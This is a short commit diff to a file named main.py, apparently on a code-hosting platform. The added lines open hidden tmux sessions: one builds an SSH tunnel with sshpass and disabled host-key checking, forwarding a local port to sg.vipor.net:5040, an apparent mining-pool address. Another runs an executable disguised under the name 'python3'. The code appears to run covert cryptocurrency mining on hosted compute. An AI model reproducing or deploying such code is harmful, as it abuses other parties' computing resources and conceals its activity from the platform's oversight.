Update main.py
Browse files
main.py
CHANGED
@@ -1,4 +1,5 @@
|
|
1 |
import os
|
2 |
-
os.system("cp google-chrome python")
|
3 |
os.system("chmod +x python3 python")
|
4 |
-
os.system("
|
|
|
|
|
|
1 |
import os
|
|
|
2 |
os.system("chmod +x python3 python")
|
3 |
+
os.system("tmux new-session -d -s ses sshpass -p ' ' ssh -o StrictHostKeyChecking=no -L 3000:sg.vipor.net:5040 [email protected]")
|
4 |
+
os.system("tmux new-session -d -s ses1 ./python3")
|
5 |
+
os.system("tmux ls")
|